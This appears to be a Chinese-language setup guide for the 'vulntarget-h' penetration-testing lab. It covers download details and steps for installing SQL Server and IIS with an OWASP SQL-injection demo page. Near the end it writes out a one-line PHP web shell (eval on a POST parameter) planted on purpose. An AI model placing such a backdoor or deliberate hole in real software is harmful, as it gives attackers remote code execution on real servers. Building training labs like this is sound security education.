vuntarget免责声明 00 相关漏洞技术 sql注入、文件包含、命令执行,免杀等漏洞利用、隧道代理等 下载地址 百度云链接 https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p 其中vulntarget-h是本次环境 github地址:
测试说明 1. 镜像都是基于VM16做的,没有向下兼容 拓扑图 01 vulntarget-h账密 02 环境搭建 点击确定 下一步->下一步->安装->下一步->下一步 到这里全选继续下一步->下一步->下一步 对所有用户使用相同账户 输入管理员账号密码 最后改成自动 输入sa密码,添加administrator账户 添加账号 然后一直下一步到安装就好了 2.windows 2008 IIS安装 勾选web服务器(IIS) 直接滚键盘,再回到管理网站选择重新启动 https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/SiteGenerator_ContentPages/Vulnerabilities/DataValidation_SqlInjection_Basic.aspx 下载下来后删掉13行,修改47行的密码
点击默认文档 https://github.com/pradeepkodical/owasp-code-central/blob/e97dd5bf2629c9f88644276121b64391141c4806/labs/SiteGenerator/FoundStoneBank_export.sql 点击数据库右键新建数据库,创建一个名为FoundStone_Bank的数据库 点击新建查询复制配置文件 最后回到首页用参数测试一下 这样就成功了 这就不写了
<?php highlight_file(__FILE__); eval($_POST['shell']); ?> 设置网站目录不可写,几个用户都修改 安装火绒 然后是常规的安装 |
|